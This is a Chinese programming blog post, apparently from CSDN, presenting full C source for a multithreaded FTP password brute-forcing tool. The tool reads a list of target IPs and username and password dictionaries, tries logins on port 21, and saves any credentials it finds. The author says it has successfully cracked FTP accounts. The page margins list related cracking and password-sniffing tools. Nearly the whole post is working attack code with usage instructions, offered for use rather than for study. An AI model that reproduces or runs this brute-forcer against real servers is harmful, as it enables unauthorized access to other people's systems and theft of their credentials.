探测FTP密码的程序源码!!!

最新推荐文章于 2019-07-16 20:22:55 发布
最新推荐文章于 2019-07-16 20:22:55 发布
阅读量2k 收藏 4
点赞数
分类专栏: VC学习 文章标签: struct socket null ftp服务器 fp winapi
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hqok/article/details/665538
版权

这个程序是用来进行暴力破解的,只需在命令行下输入:

ftp ip.txt 100

其中ip.txt为你要探测的ftp服务器的ip地址,每一行一个ip地址!100为你想要开的线程数!

而其中的必需有两个文件,ftp_user.txt,ftp_pass.txt,跟这段代码生成的可执行程序放在同一个目录下,以上的ip.txt也要放在同一个目录下!只要ftp_user.txt,ftp_pass.txt这两个字典选得好,不长的时间就可以将密码探测出来!本来这段代码是没有把探测出来的密码保存的,我加了几句,可以将用户名和密码都保存下来,分别在同一个目录下的user.txt,和ftp.txt中!

以下的源码在VC6.0下编译通过!!!并曾正确破译出ftp的用户名和密码!

//


//描述:从指定文件读入IP地址和帐号密码,猜测ftp服务器密码
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib,"ws2_32.lib")
#define PORT 21
#define VERSION 0.1.2
#define LEN sizeof(struct FILEDATA)
/

//定义全局变量

/
struct FILEDATA//存放帐号和密码的链表结构体
{
char dataLine[64];
struct FILEDATA *next;
};
struct SCANPAR//传递给Scan函数的参数结构体
{
struct FILEDATA *userHead;//帐号链表的头地址
struct FILEDATA *passHead;//密码链表的头地址
char ipNow[16];//要扫描的扫描的IP
};
int currentThread = 0;//当前活动线程
int maxThread = 0;//最大线程数量
char ipFile[48] = { 0 };//IP列表文件名
char *passFlag = "230";
char *userFlag = "331";
/
//定义函数原形
/
void GetPar(int , char **);//检查命令行参数
void Help(char *);//输出帮助函数
void WatchThread(void);//检测活动线程是否达到最大
void Wait2Quit(void);//等待所有线程退出函数
int WINAPI Scan(LPVOID);//处理帐号密码字典
void Crack(char * , char * , char *);//破解密码函数
struct FILEDATA *ReadDic2Memory(char *);//将帐号字典密码字典读入内存,存入链表
//
//主函数,程序入口
//
int main( int argc , char *argv[] )
{
DWORD threadID = 1;
HANDLE threadHandle = NULL;
FILE *fpIP = NULL;
WSADATA wsaData;
struct SCANPAR scanPar;
char fileName[48] = { 0 };
//检查并获取命令行参数
GetPar( argc , argv );
if( WSAStartup(MAKEWORD(2,2),&wsaData) != 0 )
{
printf( "载入Winsock失败.../n" );
return -1;


//打开IP列表文件
fpIP = fopen( ipFile , "r" );
if( fpIP == NULL )
{
printf( "打开IP列表文件失败.../n" );
return -1;
}

strcpy( fileName , "ftp_user.txt" );
scanPar.userHead = ReadDic2Memory( fileName );//将帐号读入内存
memset( fileName , 0 , sizeof(fileName) );
strcpy( fileName , "ftp_pass.txt" );
scanPar.passHead = ReadDic2Memory( fileName );//将密码读入内存
while( !feof(fpIP) )
{
fscanf( fpIP , "%s" , scanPar.ipNow );
 WatchThread();
 Sleep(20);
//生成新线程
threadHandle = CreateThread( NULL , 0 , (LPTHREAD_START_ROUTINE)Scan , (LPVOID)(&scanPar) , 0 , &threadID );
if( threadHandle != NULL )
{
CloseHandle(threadHandle);
currentThread ++;
threadID ++;
}
}
Wait2Quit();
fclose(fpIP);
WSACleanup();
return 0;
}
 int WINAPI Scan(LPVOID par)
{
struct SCANPAR *scan_Par = (struct SCANPAR *)par;
struct FILEDATA *pUser = scan_Par->userHead;
struct FILEDATA *pPass = scan_Par->passHead;
while( pUser != NULL )
{
if( pPass == NULL )
{
pPass = scan_Par->passHead;
}
while( pPass != NULL )
{
printf("正在%s上测试%s的密码%s....../n" , scan_Par->ipNow , pUser->dataLine , pPass->dataLine );
Crack( scan_Par->ipNow , pUser->dataLine , pPass->dataLine );

pPass = pPass->next;
}

pUser = pUser->next;

}

 

currentThread --;

return 0;

}

 

void Crack( char *ip , char *user , char *pass )

{

SOCKET sock;

SOCKADDR_IN sin;

int flag;

int timeOut;

char recvBuffer[1024] = { 0 };

 

 

sock = socket( AF_INET , SOCK_STREAM , 0 );

if( sock == INVALID_SOCKET )

{

printf( "连接%s建立socket失败/n" ,ip);

return;

}

 

//设置超时时间

timeOut = 2000;

if( setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeOut, sizeof(timeOut)) == SOCKET_ERROR )

{

printf("连接%s设置超时失败/n" , ip );

return;

}

 

memset( &sin , 0 , sizeof(sin) );

sin.sin_family = AF_INET;

sin.sin_port = htons(PORT);

sin.sin_addr.s_addr = inet_addr(ip);

 

flag = connect( sock , (struct sockaddr *)&sin , sizeof(sin) );

if( flag == SOCKET_ERROR )

{

printf( "连接服务器%s失败/n" , ip );

closesocket(sock);

return;

}

 

flag = recv( sock , recvBuffer , sizeof(recvBuffer) , 0 );

if( flag == SOCKET_ERROR )

{

printf( "%s接受banner数据失败/n" , ip);

closesocket(sock);

return;

}

 

char userCmd[48] = { 0 };

wsprintf( userCmd , "USER %s/r/n" , user );

 

flag = send( sock , userCmd , strlen(userCmd) , 0 );

if( flag == SOCKET_ERROR )

{

printf( "%s发送帐号失败/n" , ip );

closesocket(sock);

return;

}

 

memset( recvBuffer , 0 ,sizeof(recvBuffer) );

 

flag = recv( sock , recvBuffer , sizeof(recvBuffer) , 0 );

if( flag == SOCKET_ERROR )

{

printf( "%s接受user数据失败/n" , ip );

closesocket(sock);

return;

}

 

if( strlen(recvBuffer) == 0 )

{

printf( "%s接受user数据失败/n" , ip );

closesocket(sock);

return;

}

 

if( strstr(recvBuffer , userFlag) == NULL )

{

printf( "%s用户名没能通过/n" , ip );

closesocket(sock);

return;

}

 

char passCmd[48] = { 0 };

wsprintf( passCmd , "PASS %s/r/n" , pass );

 

flag = send( sock , passCmd , strlen(passCmd) , 0 );

if( flag == SOCKET_ERROR )

{

printf( "%s发送密码失败/n" , ip );

closesocket(sock);

return;

}

 

memset( recvBuffer , 0 , sizeof(recvBuffer) );

 

flag = recv( sock , recvBuffer , sizeof(recvBuffer) , 0 );

if( flag == SOCKET_ERROR )

{

printf( "%s接受pass数据失败/n" , ip );

closesocket(sock);

return;

}

 // 

if(strstr(recvBuffer , passFlag))

{

printf( "发现密码:%s/t%s/t%s/n" , ip , user , pass );
FILE * fp;
fp = fopen("pwd.txt","wt+");
fwrite(pass,sizeof(pass),1,fp);
fclose(fp);
FILE * fp1;
fp1 = fopen("user.txt","wt+");
fwrite(user,sizeof(user),1,fp1);
fclose(fp1);
}

 

closesocket(sock);

return;

}

 

struct FILEDATA *ReadDic2Memory( char *fileName )

{

struct FILEDATA *p1 = NULL;

struct FILEDATA *p2 = NULL;

struct FILEDATA *head = NULL;

FILE *fp = NULL;

int num = 0;//节点数目

 

p1 = p2 = (struct FILEDATA *)malloc(LEN);//开辟新内存单元

if( p1 == NULL )

{

printf( "开辟新内存单元失败.../n" );

exit(-1);

}

 

fp = fopen( fileName , "r" );//打开文件句柄

if( fp == NULL )

{

printf( "打开文件%s失败.../n" , fileName );

exit(-1);

}

 

while( !feof(fp) )

{

num = num + 1;

fscanf( fp , "%s" , p1->dataLine );

 

if( num == 1 )//如果是第一个节点

{

head = p1;

}

else

{

p2->next = p1;

}

 

p2 = p1;

p1 = (struct FILEDATA *)malloc(LEN);

 

fscanf( fp , "%s" , p1->dataLine );

}

 

p2->next = NULL;

 

return head;

}

 

void GetPar( int argc , char *argv[] )

{

//检查命令行参数

if( argc != 3 )

{

Help( argv[0] );

return;

}

 

if( strlen(argv[1]) < 48 )

{

strcpy( ipFile , argv[1] );

}

else

{

printf( "IP列表文件名太长.../n" );

return;

}

 

//从命令行参数获取最大线程数

maxThread = atoi( argv[2] );

if( maxThread <= 0 )

{

printf( "最大线程数错误.../n" );

return;

}

}

 

void WatchThread()

{

while(1)

{

if( currentThread >= maxThread )

{

Sleep(10);

}

else

{

break;

}

}

}

 

void Wait2Quit()

{

while(1)

{

if( currentThread > 0 )

{

Sleep(10);

}

else

{

break;

}

}

}

 

void Help(char *program)

{


printf( "Usage:%s/tIP.txt/tMaxThread/n" , program );

exit(-1);

}

 

hqok
关注
专栏目录
FTP弱口令探测工具
12-24
简单实现FTP弱口令探测工具,大家下载后正当使用,任何使用用途与本人无关!
ftp弱口令扫描工具及源代码
yiyeqinghuasoon
12-28 624
//鄙视一下CSDN,不带源码的资源被删掉了 //实际上对于指向试用的人,不要积分的资源更合适 char *lpDownLoad = "http://download.csdn.net/source/2942279"; 下载地址:http://download.csdn.net/source/2942279 结合上一篇文章(关于从搜索引擎批量获取域名转成IP),这次应该说更牛B...
Vmware模拟利用Sniffer截获FTP登陆口令
10-15
本实验为水利出版《信息安全》教材中用于教学配套教学实验!利用Vmware模拟3台虚拟PC进行Sniffer教学,制作成功的关键是电脑,笔记本的酷睿CPU对于Vmware应用有奇特功效,台式机全启虚拟客户机相当慢!
ftp文件搜索源代码(TCP端口扫描部分)
06-09
功能描述:可用于扫描指定网段,发现其中提供FTP服务的站点 ftp文件搜索的第一步就是发现Internet上存在ftp服务的计算机。由于通常ftp服务都是使用TCP 21端口,所以我们发现ftp服务的第一个方法就是扫描Internet上所有计算机的TCP 21端口是否接受连接。另外,由于Internet上的机算机数目巨大,而ftp服务也存在时效性,这就要求我们必须在尽量短的时间内完成扫描。原有的天网ftp端口扫描程序在效率上已经不能满足要求,扫描结果也不够完全,因此有必要开发新的端口扫描程序
ftpscan.rar
02-26
ftpscan:DOS下破解FTP账号密码,可自定义IP地址段。内含FTP连接器FlashFXP(已破解)
vc++ 应用源码包_1
09-15
多线程高速文件搜索程序源码 VC++视频聊天系统源代码 实例简单,有用户登录、传输文件、视频、画质调节、禁音检测、回音消除、自动增益、噪音抑制、视频控制等、 VC++搜索指定文件夹中的文件 VC++文件分割、合并...
vc++ 应用源码包_2
09-15
多线程高速文件搜索程序源码 VC++视频聊天系统源代码 实例简单,有用户登录、传输文件、视频、画质调节、禁音检测、回音消除、自动增益、噪音抑制、视频控制等、 VC++搜索指定文件夹中的文件 VC++文件分割、合并...
vc++ 应用源码包_6
09-15
多线程高速文件搜索程序源码 VC++视频聊天系统源代码 实例简单,有用户登录、传输文件、视频、画质调节、禁音检测、回音消除、自动增益、噪音抑制、视频控制等、 VC++搜索指定文件夹中的文件 VC++文件分割、合并...
vc++ 应用源码包_5
09-15
多线程高速文件搜索程序源码 VC++视频聊天系统源代码 实例简单,有用户登录、传输文件、视频、画质调节、禁音检测、回音消除、自动增益、噪音抑制、视频控制等、 VC++搜索指定文件夹中的文件 VC++文件分割、合并...
FTP弱口令扫描工具 FtpScan
08-02
在命令提示符下扫描FTP弱口令账号的小工具,速度非常快的. FtpScan v1.0 - Command Line Ftp Accounts Scanner by uhhuhy (Aug 1,2002) - http://uhhuh.myetang.com Use it with your own responsibility! Usage: ftpscan [Thread] Example: ftpscan 10.0.0.1-10.0.0.254 200
ftp检测\ftp扫描
02-03
ftp检测\ftp扫描
探测IP小工具
01-08
通过捕获ARP来分析得出本子网的IP。基于Win32API和WinPcap开发。
sniffer抓取ftp的用户名和密码
weixin_33819479的博客
08-29 2015
呵呵,好久没写博客,觉得应该学点什么,这是我最近学的sniffer,现学现卖大家不要取笑啊。 好的,咱们来看如何使用sniffer抓取ftp的用户名和密码。 首先,设置抓包筛选,抓包是的范围使用ip地址区分any和any表示所有的ip地址都抓取,第二张图设置的是抓包使用的协议,我们要抓ftp的用户名和密码就选择IP---tcp---ftp。 开始抓包 ...
FTP登录时指定用户名密码的方法
热门推荐
皓月如我的专栏
06-18 6万+
ftp是网络常用命令,但是使用此命令时都必须根据提示交互式的输入用户名和密码,对于希望程序自动执行或者批处理而言很不方便。下面提供两种ftp登陆时指定用户名密码的方法:1.使用命令ftp://username:password@hostname:port   这种用法只能在览器使用,不能在命令行使用。2.在命令行可以使用配置文件来解决这个问题:   格式:ftp -s:[配置文
内网FTPpassword嗅探
125096
05-19 1466
protoinfo.h ////////////////////////////////////////////////// // protoinfo.h文件 /* 定义协议格式 定义协议中使用的宏 */ #ifndef __PROTOINFO_H__ #define __PROTOINFO_H__ #define ETHERTYPE_IP 0x0800 #define E
Scapy嗅探FTP用户密码
zwlww1的博客
01-23 1544
#!/usr/bin/python #coding=utf-8 import optparse from scapy.all import * def ftpSniff(pkt): dest = pkt.getlayer(IP).dst raw = pkt.sprintf('%Raw.load%') user = re.findall('(?i)USER (.*)', r
FTP访问抓包,可检测用户及密码
Karmic的博客
07-16 3055
部署FTP服务器,打开VMware 打开Win10虚拟机,打开FTP服务器构建软件FileZilla_Server-0_9_60_2直接单击Connect连接 选择User添加用户 使用add添加用户功能,添加共享访问用户 anonymous 和FTP,将FTP用户加上密码密码为:123456 共享文件为虚拟机C盘,将FTP的权限设置为读、写。 最后点击OK完成创建。 虚拟机网卡使用VMn...
C语言课程设计报告--很久很久以前的课程设计报告
王百万的Blog
06-05 1万+
C语言课程设计报告 一、实践的目的和要求加深对《C语言》课程所学知识的理解,进一步巩固C语言语法规则。学会编制结构清晰、风格良好、数据结构适当的C语言程序,从而具备解决综合性实际问题的能力。 二、实践内容在熟练掌握C语言的基本知识:数据类型(整形、实型、字符型、指针、数组、结构等);运算类型(算术运算、逻辑运算、自增自减运算、赋值运算等);程序结构(顺序结构、判断选择结构、
nmap探测ftp匿名登录
最新发布
10-03
从nmap的扫描结果中可以看出,21端口是ftp服务,并且可以进行匿名登录。要进行ftp匿名登录,可以使用以下步骤: 1. 使用ftp命令连接到目标主机,例如:ftp <目标主机IP> 2. 输入anonymous作为用户名 3. 按回车键...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值